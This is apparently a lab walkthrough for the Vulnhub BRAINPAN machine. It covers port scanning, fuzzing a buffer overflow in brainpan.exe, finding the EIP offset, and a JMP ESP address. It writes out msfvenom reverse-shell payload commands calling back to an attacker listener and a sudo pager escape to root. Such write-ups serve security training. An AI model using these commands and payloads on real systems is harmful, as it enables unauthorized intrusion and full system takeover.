Vulnhub BRAINPAN Walkthrough

After importing the VM into VMware, we start by scanning it with nmap:

nmap -A -T4 -p- 192.168.1.5 -vv

Only two ports are open, 9999 and 10000, so we visit both in the browser using the IP address together with each port.

Port 9999:

Port 10000:

The next step is to connect with netcat: nc 192.168.1.5 9999

Whatever password I try is rejected, so let's try another way: start nikto and dirb.

Both nikto and dirb report the same finding: a /bin directory.

It contains an exe file, which suggests a buffer overflow is the next thing to try. I started a Windows 7 machine, downloaded brainpan.exe, and opened it in Immunity Debugger.

I took a buffer overflow script from GitHub and tweaked it a bit to fuzz the program on Windows 7 and find the input length that triggers the overflow.

The app crashed at around 700 bytes. To find the exact offset needed to overwrite EIP, we run pattern_create -l 700.

We copy the generated pattern into the next script.

Restart the debugger and run the script again.

We are interested in the EIP value 35724134. Running pattern_offset -q 35724134 gives an offset of 524.
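To see why that EIP value maps to offset 524, here is an added example (not the author's script) that rebuilds the same Upper/lower/digit pattern pattern_create emits and looks up the crash value the way pattern_offset does: Immunity shows EIP as a big-endian number, but x86 stores it little-endian, so 35724134 is the text "4Ar5" on the stack, and that substring starts 524 bytes into the pattern.

```python
import string


def cyclic_pattern(length):
    """Build the same non-repeating Upper/lower/digit pattern that
    pattern_create -l <length> emits, truncated to `length` characters."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if 3 * len(chunks) >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]  # beyond 20280 chars the scheme would repeat


def eip_to_stack_bytes(eip_hex):
    """The debugger prints EIP as a big-endian hex number, but the dword was
    written little-endian: 35724134 sat on the stack as 34 41 72 35 = '4Ar5'."""
    return bytes.fromhex(eip_hex.lower().replace("0x", ""))[::-1]


def pattern_offset(eip_hex, length=700):
    """Equivalent of pattern_offset -q <eip>: position of the four crash bytes
    inside the pattern that was sent, or -1 if they did not come from it."""
    return cyclic_pattern(length).encode("ascii").find(eip_to_stack_bytes(eip_hex))


if __name__ == "__main__":
    # Values from this walkthrough: crash at ~700 bytes, EIP = 35724134.
    print(cyclic_pattern(700)[524:528])  # 4Ar5
    print(pattern_offset("35724134"))     # 524
```

A crash value such as 42424242 ("BBBB") returns -1, which is how you tell a pattern hit from the plain A/B filler used in the next step.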

The next script contains the offset we found, 524, followed by a list of bad characters (google them).

EIP is now flooded with the "A"s and "B"s from the script.

Now we have successfully overwritten EIP. Next we need our buffer to land in ESP, so let's first get the opcode bytes for JMP ESP from nasm.

Then search for them with the mona module: !mona find -s "\xff\xe4" -m brainpan.exe

The address we are looking for is 0x311712f3. To verify that it is a JMP ESP, we select Go to >> Expression in the debugger and enter it.

Next, we create a shellcode with msfvenom:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=4444 -b "\x00\x0a" -e x86/shikata_ga_nai -f c

Copy the result into the next script:

After running the script with a listener on port 4444, we get a shell.

I got a shell on the Windows 7 system, so I went back to the BRAINPAN host and tried the same steps, but I couldn't upgrade the shell, and it sometimes crashed when running python -c 'import pty; pty.spawn("/bin/bash")'.

So I went back and changed the payload to a Linux one and the encoder to alpha_upper:

msfvenom -p linux/x86/shell_reverse_tcp -b "\x00" LHOST=192.168.1.11 LPORT=4444 R -e x86/alpha_upper -f c

With a handler in msfconsole I got a shell, tried python -c 'import pty; pty.spawn("/bin/bash")' again, and this time it works.

After that, run sudo -l and follow what is shown on the screen.

You need to enter: sudo /home/anansi/bin/anansi_util manual ifconfig

When the (PRESS RETURN) prompt appears, type !/bin/bash and you get root access.
